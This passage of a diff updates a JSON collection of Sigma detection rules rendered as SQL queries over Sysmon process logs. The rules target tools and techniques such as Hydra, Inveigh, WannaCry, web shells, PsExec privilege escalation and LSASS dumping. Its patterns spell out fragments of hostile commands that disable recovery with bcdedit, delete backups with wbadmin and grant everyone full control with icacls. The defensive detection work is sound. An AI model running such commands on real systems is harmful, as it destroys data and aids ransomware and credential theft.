'%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%type nul >%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')) AND CommandLine LIKE '%.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) AND (ParentCommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' AND ParentCommandLine LIKE '%RoamDiag.cmd%' ESCAPE '\\' AND ParentCommandLine LIKE '%-outputpath%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_formbook.yml" + "filename": "proc_creation_win_lolbin_settingsynchost.yml" }, { - "title": "HackTool - Inveigh Execution", - "id": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", - "status": "experimental", - "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - Hydra Password Bruteforce Execution", + "id": "aaafa146-074c-11eb-adc1-0242ac120002", + "status": "test", + "description": "Detects command line parameters used by Hydra password guessing hack tool", + "author": "Vasiliy Burov", "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.t1110", + "attack.t1110.001" ], "falsepositives": [ - "Very unlikely" + "Software that uses the caret encased keywords PASS and USER in its command line" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR (OriginalFileName LIKE '\\\\Inveigh.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\Inveigh.dll' ESCAPE '\\') OR Description = 'Inveigh' OR (CommandLine LIKE '% -SpooferIP%' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToIPs %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToDomains %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToMACs %' ESCAPE '\\' OR CommandLine LIKE '% -SnifferIP%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\' AND (CommandLine LIKE '%^USER^%' ESCAPE '\\' OR CommandLine LIKE '%^PASS^%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_inveigh.yml" + "filename": "proc_creation_win_hktl_hydra.yml" }, { - "title": "Suspicious WebDav Client Execution", - "id": "982e9f2d-1a85-4d5b-aea4-31f5e97c6555", + "title": "Suspicious New Service Creation", + "id": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", "status": "experimental", - "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397\n", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1048.003", - "cve.2023.23397" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}') AND NOT (((CommandLine LIKE '%://10.%' ESCAPE '\\' OR CommandLine LIKE '%://192.168.%' ESCAPE '\\' OR CommandLine LIKE '%://172.16.%' ESCAPE '\\' OR CommandLine LIKE '%://172.17.%' ESCAPE '\\' OR CommandLine LIKE '%://172.18.%' ESCAPE '\\' OR CommandLine LIKE '%://172.19.%' ESCAPE '\\' OR CommandLine LIKE '%://172.20.%' ESCAPE '\\' OR CommandLine LIKE '%://172.21.%' ESCAPE '\\' OR CommandLine LIKE '%://172.22.%' ESCAPE '\\' OR CommandLine LIKE '%://172.23.%' ESCAPE '\\' OR CommandLine LIKE '%://172.24.%' ESCAPE '\\' OR CommandLine LIKE '%://172.25.%' ESCAPE '\\' OR CommandLine LIKE '%://172.26.%' ESCAPE '\\' OR CommandLine LIKE '%://172.27.%' ESCAPE '\\' OR CommandLine LIKE '%://172.28.%' ESCAPE '\\' OR CommandLine LIKE '%://172.29.%' ESCAPE '\\' OR CommandLine LIKE '%://172.30.%' ESCAPE '\\' OR CommandLine LIKE '%://172.31.%' ESCAPE '\\' OR CommandLine LIKE '%://127.%' ESCAPE '\\' OR CommandLine LIKE '%://169.254.%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%binPath=%' ESCAPE '\\') OR (CommandLine LIKE '%New-Service%' ESCAPE '\\' AND CommandLine LIKE '%-BinaryPathName%' ESCAPE '\\')) AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_webdav_client_susp_execution.yml" + "filename": "proc_creation_win_susp_service_creation.yml" }, { - "title": "Suspicious Windows Update Agent Empty Cmdline", - "id": "52d097e2-063e-4c9c-8fbb-855c8948d135", - "status": "experimental", - "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags", - "author": "Florian Roth (Nextron Systems)", + "title": "WannaCry Ransomware Activity", + "id": "41d40bff-377a-43e2-8e1b-2e543069e079", + "status": "test", + "description": "Detects WannaCry ransomware activity", + "author": "Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro", + "tags": [ + "attack.lateral_movement", + "attack.t1210", + "attack.discovery", + "attack.t1083", + "attack.defense_evasion", + "attack.t1222.001", + "attack.impact", + "attack.t1486", + "attack.t1490" + ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'Wuauclt.exe') AND CommandLine LIKE '%\\\\Wuauclt.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\tasksche.exe' ESCAPE '\\' OR Image LIKE '%\\\\mssecsvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskdl.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhsvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskse.exe' ESCAPE '\\' OR Image LIKE '%\\\\111.exe' ESCAPE '\\' OR Image LIKE '%\\\\lhdfrgui.exe' ESCAPE '\\' OR Image LIKE '%\\\\linuxnew.exe' ESCAPE '\\' OR Image LIKE '%\\\\wannacry.exe' ESCAPE '\\') OR Image LIKE '%WanaDecryptor%' ESCAPE '\\' OR (CommandLine LIKE '%icacls%' ESCAPE '\\' AND CommandLine LIKE '%/grant%' ESCAPE '\\' AND CommandLine LIKE '%Everyone:F%' ESCAPE '\\' AND CommandLine LIKE '%/T%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\') OR (CommandLine LIKE '%bcdedit%' ESCAPE '\\' AND CommandLine LIKE '%/set%' ESCAPE '\\' AND CommandLine LIKE '%{default}%' ESCAPE '\\' AND CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\') OR (CommandLine LIKE '%wbadmin%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%-quiet%' ESCAPE '\\') OR CommandLine LIKE '%@Please\\_Read\\_Me@.txt%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wuauclt_no_cli_flags_execution.yml" + "filename": "proc_creation_win_malware_wannacry.yml" }, { - "title": "HackTool - PPID Spoofing SelectMyParent Tool Execution", - "id": "52ff7941-8211-46f9-84f8-9903efb7077d", - "status": "test", - "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent", + "title": "Security Privileges Enumeration Via Whoami.EXE", + "id": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b", + "status": "experimental", + "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1134.004" + "attack.privilege_escalation", + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SelectMyParent.exe' ESCAPE '\\' OR (CommandLine LIKE '%PPID-spoof%' ESCAPE '\\' OR CommandLine LIKE '%ppid\\_spoof%' ESCAPE '\\' OR CommandLine LIKE '%spoof-ppid%' ESCAPE '\\' OR CommandLine LIKE '%spoof\\_ppid%' ESCAPE '\\' OR CommandLine LIKE '%ppidspoof%' ESCAPE '\\' OR CommandLine LIKE '%spoofppid%' ESCAPE '\\' OR CommandLine LIKE '%spoofedppid%' ESCAPE '\\' OR CommandLine LIKE '% -spawnto %' ESCAPE '\\') OR (OriginalFileName LIKE '%PPID-spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%ppid\\_spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof-ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof\\_ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%ppidspoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofedppid%' ESCAPE '\\') OR Description = 'SelectMyParent' OR Imphash IN ('04d974875bd225f00902b4cad9af3fbc', 'a782af154c9e743ddf3f3eb2b8f3d16e', '89059503d7fbf470e68f7e63313da3ad', 'ca28337632625c8281ab8a130b3d6bad') OR (Hashes LIKE '%IMPHASH=04D974875BD225F00902B4CAD9AF3FBC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A782AF154C9E743DDF3F3EB2B8F3D16E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89059503D7FBF470E68F7E63313DA3AD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CA28337632625C8281AB8A130B3D6BAD%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /priv%' ESCAPE '\\' OR CommandLine LIKE '% -priv%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_selectmyparent.yml" + "filename": "proc_creation_win_whoami_priv_discovery.yml" }, { - "title": "DNS RCE CVE-2020-1350", - "id": "b5281f31-f9cc-4d0d-95d0-45b91c45b487", + "title": "Shells Spawned by Web Servers", + "id": "8202070f-edeb-4d31-a010-a26c72ac5600", "status": "test", - "description": "Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack", + "author": "Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1569.002" + "attack.persistence", + "attack.t1505.003", + "attack.t1190" ], "falsepositives": [ - "Unknown but benign sub processes of the Windows DNS service dns.exe" + "Particular web applications may spawn a shell process legitimately" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\System32\\\\werfault.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\dnscmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_TomcatService.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentCommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR ParentCommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\' OR ParentCommandLine LIKE '%catalina.home%' ESCAPE '\\'))) AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\arp.exe' ESCAPE '\\' OR Image LIKE '%\\\\at.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\dsget.exe' ESCAPE '\\' OR Image LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR Image LIKE '%\\\\find.exe' ESCAPE '\\' OR Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\hostname.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\netdom.exe' ESCAPE '\\' OR Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntdutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\pathping.exe' ESCAPE '\\' OR Image LIKE '%\\\\ping.exe' ESCAPE '\\' OR Image LIKE '%\\\\qprocess.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\' OR Image LIKE '%\\\\qwinsta.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\tasklist.exe' ESCAPE '\\' OR Image LIKE '%\\\\tracert.exe' ESCAPE '\\' OR Image LIKE '%\\\\ver.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wusa.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%Windows\\\\system32\\\\cmd.exe /c C:\\\\ManageEngine\\\\ADManager \"Plus\\\\ES\\\\bin\\\\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt' ESCAPE '\\') OR (CommandLine LIKE '%sc query%' ESCAPE '\\' AND CommandLine LIKE '%ADManager Plus%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2020_1350.yml" + "filename": "proc_creation_win_webshell_spawn.yml" }, { - "title": "Renamed Jusched.EXE Execution", - "id": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", - "status": "test", - "description": "Detects the execution of a renamed \"jusched.exe\" as seen used by the cobalt group", - "author": "Markus Neis, Swisscom", + "title": "Suspicious Parent Double Extension File Execution", + "id": "5e6a80c8-2d45-4633-9ef4-fa2671a39c5c", + "status": "experimental", + "description": "Detect execution of suspicious double extension files in ParentCommandLine", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1036.003" + "attack.t1036.007" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Description IN ('Java Update Scheduler', 'Java(TM) Update Scheduler') AND NOT (Image LIKE '%\\\\jusched.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%.doc.lnk' ESCAPE '\\' OR ParentImage LIKE '%.docx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.xls.lnk' ESCAPE '\\' OR ParentImage LIKE '%.xlsx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.ppt.lnk' ESCAPE '\\' OR ParentImage LIKE '%.pptx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.rtf.lnk' ESCAPE '\\' OR ParentImage LIKE '%.pdf.lnk' ESCAPE '\\' OR ParentImage LIKE '%.txt.lnk' ESCAPE '\\' OR ParentImage LIKE '%.doc.js' ESCAPE '\\' OR ParentImage LIKE '%.docx.js' ESCAPE '\\' OR ParentImage LIKE '%.xls.js' ESCAPE '\\' OR ParentImage LIKE '%.xlsx.js' ESCAPE '\\' OR ParentImage LIKE '%.ppt.js' ESCAPE '\\' OR ParentImage LIKE '%.pptx.js' ESCAPE '\\' OR ParentImage LIKE '%.rtf.js' ESCAPE '\\' OR ParentImage LIKE '%.pdf.js' ESCAPE '\\' OR ParentImage LIKE '%.txt.js' ESCAPE '\\') OR (ParentCommandLine LIKE '%.doc.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.doc.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.js%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_jusched.yml" + "filename": "proc_creation_win_susp_double_extension_parent.yml" }, { - "title": "Filter Driver Unloaded Via Fltmc.EXE", - "id": "4931188c-178e-4ee7-a348-39e8a7a56821", - "status": "test", - "description": "Detect filter driver unloading activity via fltmc.exe", - "author": "Nasreddine Bencherchali", + "title": "Potential Privilege Escalation To LOCAL SYSTEM", + "id": "207b0396-3689-42d9-8399-4222658efc99", + "status": "experimental", + "description": "Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1562", - "attack.t1562.002" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Unknown" + "Weird admins that rename their tools", + "Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND CommandLine LIKE '%unload%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%unload rtp\\_filesystem\\_filter' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%PsExec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_fltmc_unload_driver.yml" + "filename": "proc_creation_win_sysinternals_susp_psexec_paexec_flags_.yml" }, { - "title": "WhoAmI as Parameter", - "id": "e9142d84-fbe0-401d-ac50-3e519fb00c89", + "title": "Renamed Jusched.EXE Execution", + "id": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", "status": "test", - "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of a renamed \"jusched.exe\" as seen used by the cobalt group", + "author": "Markus Neis, Swisscom", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.execution", + "attack.defense_evasion", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%.exe whoami%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Description IN ('Java Update Scheduler', 'Java(TM) Update Scheduler') AND NOT (Image LIKE '%\\\\jusched.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_whoami_as_param.yml" + "filename": "proc_creation_win_renamed_jusched.yml" }, { - "title": "Potential Credential Dumping Via WER", - "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3", - "status": "experimental", - "description": "Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass", - "author": "@pbssubhash , Nasreddine Bencherchali", + "title": "SystemStateBackup Deleted Using Wbadmin.EXE", + "id": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", + "status": "test", + "description": "Deletes the Windows systemstatebackup using wbadmin.exe.\nThis technique is used by numerous ransomware families.\nThis may only be successful on server platforms that have Windows Backup enabled.\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the \"-p\" parameter in the CommandLine." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Werfault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND CommandLine LIKE '% -u -p %' ESCAPE '\\' AND CommandLine LIKE '% -ip %' ESCAPE '\\' AND CommandLine LIKE '% -s %' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete %' ESCAPE '\\' AND CommandLine LIKE '%systemstatebackup %' ESCAPE '\\' AND CommandLine LIKE '%-keepVersions:0%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_werfault_lsass_shtinkering.yml" + "filename": "proc_creation_win_wbadmin_delete_systemstatebackup.yml" }, { - "title": "Suspicious Reg Add BitLocker", - "id": "0e0255bf-2548-47b8-9582-c0955c9283f5", + "title": "HackTool - Stracciatella Execution", + "id": "7a4d9232-92fc-404d-8ce1-4c92e7caf539", "status": "experimental", - 